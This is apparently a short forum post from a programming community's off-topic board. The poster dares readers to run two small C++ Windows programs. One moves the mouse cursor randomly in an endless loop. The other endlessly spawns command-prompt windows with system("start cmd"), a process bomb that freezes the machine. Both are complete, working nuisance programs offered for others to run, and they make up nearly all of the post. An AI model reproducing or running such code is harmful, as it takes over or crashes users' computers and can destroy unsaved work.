违规紫删
  • 板块灌水区
  • 楼主__xiaoli__
  • 当前回复11
  • 已保存回复12
  • 发布时间2025/1/21 13:30
  • 上次更新2025/1/21 13:44:34
查看原帖
违规紫删
1630005
__xiaoli__楼主2025/1/21 13:30

谁敢试试 1.

#include<windows.h>
#include <ctime>
using namespace std;
int main(){
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
srand(time(0));
while(1)
SetCursorPos(rand()%x,rand()%y);
return 0;
}
#include<windows.h>
using namespace std;
int main() {
system("color F5");
for(;;) system("start cmd");
return 0;
}
2025/1/21 13:30
加载中...